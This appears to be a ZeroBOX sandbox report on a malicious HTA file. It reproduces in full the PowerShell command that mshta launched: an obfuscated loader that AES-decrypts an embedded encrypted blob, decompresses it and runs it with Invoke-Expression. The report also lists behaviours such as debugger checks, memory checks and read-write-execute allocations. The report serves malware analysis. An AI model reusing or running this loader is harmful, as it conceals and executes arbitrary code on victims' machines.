Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 24, 2022, 7:32 a.m.	May 24, 2022, 7:35 a.m.

Size	112.1KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`99971c5e84c23a0afbe59d7b24f0c8f5`
SHA256	`a80b0916d0be6318dd725f91ea35509f30e83c344fec96b1c14b57f4d0cf840e`
CRC32	`BBB962E5`
ssdeep	`1536:3DN3dG7CnhjE28IFHWtubPTza772uPTUwX3uraMkMTzCHqUjolOWbwDET42tGi7u:y/vP`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\upload.hta
2328
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)
  2420

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 24, 2022, 7:32 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 24, 2022, 7:32 a.m.			0	0

Command line console output was observed (50 out of 145 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does console_handle: 0x00000023	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: n't contain a method named 'Dispose'. console_handle: 0x0000002f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: At line:1 char:2774 console_handle: 0x0000003b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: + $UGJgEhmuQd = 'AAAAAAAAAAAAAAAAAAAAAEC4K2DdresXc6AuVXsd0sBMIPMLxigD6xskYu+Lw5 console_handle: 0x00000047	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: bOrzOSEka0gQxVcfYajOu4HND2313+fKcSfjtnuOp/4Q/ZvXzpHyzZ3GF8nvfohlG/ekwbiL4vGZGfT console_handle: 0x00000053	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: K7PsCRfvoGwvuAZzVvbbKoE/ieHgzb0oFDE3Lqdi5GwDBxVCwP6fxjB0i5vnrEUmlvjHqEJ/sekccu0 console_handle: 0x0000005f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: plvcxZA4Snn3BYb5X73LsQg2FioZZhzj+v64UbpgP/BWsThQx0DNYa4DDES86WmjIR/wy2nG9vch69H console_handle: 0x0000006b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: uUjylq68+JYsCAj4H3bwpGlaVJq+GsfxBK6aAfdNvim9ruE1xZEOIqC0I6C98fGJNDnRWyRlRVsfZWV console_handle: 0x00000077	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: aBehhHGNejwLiW7V0DeRnc1Y9S5zCRTdvcyLOgJLLDkouqzsA3sSMJI8ya7/yO9gCR4dbTSMyK8ULZQ console_handle: 0x00000083	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: FtNKSMmy3/VfoEjPJecTN/EnKPVXs/XnSe9MjHjC+1Xhqh4VQYbkzffXQ8+lyp0ZmP+9DtyFIWMdM6c console_handle: 0x0000008f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: M9DduzlD3L0t7WImsFZxA7ynlkbN+EWWEja6q3ZNBk6BmNgWXiSXt0mxLhUmcO/oh8jdMRpdY6Br31X console_handle: 0x0000009b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: 6GFx4OX0mdlGEtxC5ujrdvSUfRXr02nob2ZYcmGNlP0xFOd0fH9Y94DQIbJgn1PJazJ2IgZlkfNSq78 console_handle: 0x000000a7	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: rgX4Awpfla76IKcb+IbkpqbmT7whA6hkoVXBJuUIusHlOf4eKgxy5ZY0PUaIQdV5AquY5ieImU5/LKm console_handle: 0x000000b3	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: 9q6r6FUxy7GXOO1/YWgr59/oFEQULdMY6qhTag878XtQVAXAmWFX6JbQYuqJOHiaOCwB+EqLu0ownBh console_handle: 0x000000bf	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: ztSx00kmdZ4vrwcv1ADZmwFGTSa2lebgRdc6M8UucywiwBMKleqqhCX9j9RWIydLnLNj6uGH0P1G1Pg console_handle: 0x000000cb	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: zWdC0H6O0kihci6sgjYT8oCT3+rs+poKZAl7ykWSisMpuOssUH/wc68QG3le7vgXqkZMkv64czHherS console_handle: 0x000000d7	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: heGM449+jHNUFNM1xr365mZjmclzxOBAS98jNeWuavXubEYfP8NSXBl2/soTT1A/hHKgpnvC6WEe+0S console_handle: 0x000000e3	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: kSJ4dMSZ7Df6aE7iBafEr16+5znJcfPeI3x/zJTjyDfuVwFFnof2Ah2LEMCaJniFKPTO2/b5kzobr+0 console_handle: 0x000000ef	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: tWWkSxaenpP0kvoZz5evxRQSxEyOVN9HFuJ6KnfeWgA9HDJ+JQlH+H/hC/7rzMTvsv17LGlk1x/PM4F console_handle: 0x000000fb	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: RwiSD4hwY8VZ9pyquyy6H9a7o63UUE0KGoYGYrpl/SsN9R3VAN0b3uBF+ZR9F77Mz6J/+TJYvtfOVvq console_handle: 0x00000107	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: 6LKAth7Ywbsh0VNJvf6Ea6Frg3P0+aGIs/vEWgLGhicAQ8UazUWgsAC4FEEiIFOPDScCRTa6RW6+fZX console_handle: 0x00000113	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: r38W5idu6FSg/kWweIsECQHXqNPH4vw4u/W7XsiIiVCKM0RhNtUvB0slBc44DZJxPbYIvR1CjiNrauF console_handle: 0x0000011f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: DrCn0iQirQL/Et8cduBRhh7I7Z24l/HcQulvcguCvAgeA476esOCTSj8m0vXf0bNvDZfC7crZg1yZRA console_handle: 0x0000012b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: sf4VCzfsgFFk3TLhXT0sqa1u1PLK3ZDYpbvn238AXY3pmuCEhwk7HzO3ZdkhJqtwBBYtCTtAO4FIJxY console_handle: 0x00000137	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: N74njDb79m5PXpkKx+DyKl1YuauszMmt3DxMNN0Es9Y601rkmrV/Qa+w+PA01zmLuFMIFeT+/xPTEdw console_handle: 0x00000143	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: C1uIlH99EjvnQcej9YccVJ37uq5GhBYYC8M4B5prvV0t2/mstmwKftk5p02TrnAAIBQGR1W6Wplhyx/ console_handle: 0x0000014f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: bY1t6WbF/5mzu9XFZdvk7W6VJBFlKB4VgnKyhhBhb10ahzu0c1eZaEvVoTxvx0qBvnJU8HrwaQm8Ef4 console_handle: 0x0000015b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: 7ezD4kep7Z/l9T1n/7bskquu2sYcYo81UF1cXQUts3KkjO/+8SOKWImug0oNR5PR0PMPHtSSsLLBwYg console_handle: 0x00000167	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: kUm1wfNHvGjbJl0xY4AbxxwAcX/8L5TFvKaVrDp8B6BMddExC+LVcM5VhzI3nseEdfDZ78c6h7CyFN7 console_handle: 0x00000173	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: pnSRmUO+6+F1e+UOafgV8yv+igNzvw6OZ8Qcga8s09v94L/2M6vZzCZ42VAPGJjCMcZS+4h6QlD';$W console_handle: 0x0000017f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: KVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-O console_handle: 0x0000018b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: bject 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Securi console_handle: 0x00000197	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: ty.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptogra console_handle: 0x000001a3	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: phy.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbH console_handle: 0x000001af	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: gtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System. console_handle: 0x000001bb	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbH console_handle: 0x000001c7	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: gtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkT console_handle: 0x000001d3	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: OHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgt console_handle: 0x000001df	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: fJ.Dispose <<<< ();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRi console_handle: 0x000001eb	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: o );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-O console_handle: 0x000001f7	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: bject System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode] console_handle: 0x00000203	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: ::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close( console_handle: 0x0000020f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: );$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = console_handle: 0x0000021b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZi console_handle: 0x00000227	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: PscSF) console_handle: 0x00000233	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx console_handle: 0x0000023f	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: ception console_handle: 0x0000024b	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000257	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: Method invocation failed because [System.IO.Compression.GZipStream] doesn't con console_handle: 0x00000277	1	1
WriteConsoleW May 24, 2022, 7:32 a.m.	buffer: tain a method named 'CopyTo'. console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061ca88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cb48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cf08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061c788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061d408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 24, 2022, 7:32 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0061cc08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 24, 2022, 7:32 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 154 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x714b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x714b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02382000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02392000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02701000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02393000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
